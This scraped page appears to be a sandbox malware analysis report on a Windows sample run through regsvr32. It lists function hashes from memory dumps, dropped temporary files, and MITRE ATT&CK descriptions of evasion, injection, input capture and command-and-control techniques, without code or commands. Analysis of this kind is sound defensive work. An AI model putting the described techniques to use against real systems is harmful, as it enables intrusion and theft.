Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 0ab59116831bbe62dcdadced444a5e6377d12d240e7c680d2d1bd855e87776a3
Instruction ID: 114cced5e89281a9dc190132b20ccea86ba9aa9a654ac2212998114029daf3bf
Opcode Fuzzy Hash: 0ab59116831bbe62dcdadced444a5e6377d12d240e7c680d2d1bd855e87776a3
Instruction Fuzzy Hash: 300180B2624B9486DB10DF12E4543A9B665F798FE8F989321AF5807B98CF38C145CB04

Function 02E6D627 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 02E579AC: _getptd.LIBCMT ref: 02E579B9
Part of subcall function 02E579AC: _getptd.LIBCMT ref: 02E579CC

_getptd.LIBCMT ref: 02E6D688
_getptd.LIBCMT ref: 02E6D69B

Strings

csm, xrefs: 02E6D647

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm
API String ID: 3186804695-1018135373
Opcode ID: 433e7348067b57c19063a6e5e3819906beb9ca32c691c09114a4435d6686f511
Instruction ID: b8e31632d201eb00f4b21693cecc520d2a40274f9ce3ce2e11cb48b07db5bac5
Opcode Fuzzy Hash: 433e7348067b57c19063a6e5e3819906beb9ca32c691c09114a4435d6686f511
Instruction Fuzzy Hash: 8E012C626D164189CB309F329C443BC2365E759BADF8AA225DE4D0A618CB31C591CB61

Function 02E52F0C Relevance: 5.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02E52F31

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

free.LIBCMT ref: 02E52F44
free.LIBCMT ref: 02E52F57
free.LIBCMT ref: 02E52F6A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: f0a32442132290b978abf0824dadd0382e9fcad70a2f2925c0411fa04f225afc
Instruction ID: b8c083cb341a30fae4cc98f41fb9e28f8f4f832e4480c54d91d0574a08774cf2
Opcode Fuzzy Hash: f0a32442132290b978abf0824dadd0382e9fcad70a2f2925c0411fa04f225afc
Instruction Fuzzy Hash: 5BF062166A272448DF64EFB1D0A43392330EB94F7CF58AB14DF6A0A1C8CF28C480C791

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RXxeYma4d5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41rinyps.xlm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhz10a0f.wto.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhxsko0z.2vx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyek4is0.htl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loixfcyb.03j.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofuqpfwj.p5u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeeagnrb.0lp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v23tiosc.ond.ps1

C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp

C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_setup64.tmp

Windows Analysis Report
RXxeYma4d5.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre